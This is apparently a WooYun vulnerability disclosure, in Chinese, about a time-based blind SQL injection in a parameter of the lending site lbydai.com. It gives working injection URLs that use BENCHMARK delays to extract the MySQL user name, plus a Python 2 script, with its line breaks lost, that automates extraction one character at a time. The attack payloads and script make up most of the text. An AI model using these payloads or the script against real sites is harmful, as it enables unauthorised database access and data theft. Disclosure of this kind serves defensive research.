乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-03: 厂商已经主动忽略漏洞,细节向公众公开
http://lbydai.com/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use=') and 'aa' like if(length(user()) like 14,BENCHMARK(6000000,encode("hello","goodbye")),'a') -- &hasinvest=&keywords=&order=&spread_month=10
上述为真,会延迟8秒左右,user的长度为14.如果为假,会延迟2秒多:
http://lbydai.com/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use=') and 'aa' like if((mid(user()from(1)for(1))) like '%r%',BENCHMARK(6000000,encode("hello","goodbye")),'a') -- &hasinvest=&keywords=&order=&spread_month=10
上述为真,会延迟8秒左右(此消息表明user的第一位为r)
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded',}payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 15): for payload in payloads: #time.sleep(5) s = "') and 'aa' like if((mid(user()from(%s)for(1))) like '%%%s%%',BENCHMARK(6000000,encode(\"hello\",\"goodbye\")),'a') -- " % (i, (payload)) s = "/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use="+urllib.quote(s)+"&hasinvest=&keywords=&order=&spread_month=10" conn = httplib.HTTPConnection('lbydai.com', timeout=100) conn.request(method='POST', url=s, headers=headers) start_time = time.time() html_doc = conn.getresponse().read() conn.close() print '.', print time.time() - start_time if time.time() - start_time > 7.7: user += payload print '\n[in progress]', user, break print '\n[Done] MySQL user is %s' % user
未能联系到厂商或者厂商积极拒绝